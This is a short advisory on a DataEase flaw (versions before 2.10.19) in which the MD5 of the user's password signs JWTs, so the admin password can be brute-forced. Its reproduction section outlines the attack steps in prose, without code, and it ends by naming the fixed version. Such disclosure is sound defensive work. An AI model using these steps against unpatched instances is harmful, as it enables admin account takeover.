DataEase Brute-Force Vulnerability in JWT Secret Derivation Allows Admin Password Recovery

A vulnerability exists in DataEase versions prior to 2.10.19, where the MD5 hash of the user's password is used as the JWT signing secret. This deterministic approach enables attackers to brute-force the admin's password by exploiting unmonitored API endpoints that validate JWT tokens. Once the admin password is obtained, it allows for full account takeover.

Impact

Exploitation of this vulnerability could lead to unauthorized access to the admin account, allowing the attacker to take over the application.

Reproduction

To reproduce this vulnerability, change the admin password to a known value and compute its MD5 hash. Verify that the JWT tokens are signed using this hash as the secret. Then, identify an unmonitored API endpoint that accepts JWT tokens and validates the signature. Use this endpoint to brute-force the JWT secret and recover the admin password.

Remediation

Users are advised to upgrade to DataEase version 2.10.19 or later.